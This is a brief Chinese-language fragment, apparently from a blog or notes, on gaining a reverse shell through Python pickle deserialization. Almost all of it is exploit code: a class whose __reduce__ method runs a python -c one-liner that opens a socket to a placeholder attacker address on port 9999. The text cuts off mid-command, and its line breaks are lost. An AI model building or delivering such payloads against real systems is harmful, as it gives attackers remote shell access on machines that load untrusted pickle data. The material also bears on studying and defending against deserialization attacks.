pickle反序列化执行代码反弹 shell
使用__reduce__魔术方法执行import pickleimport osclass A(object): def __reduce__(self): a = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("xxx.xxx.xxx.xxx",9999)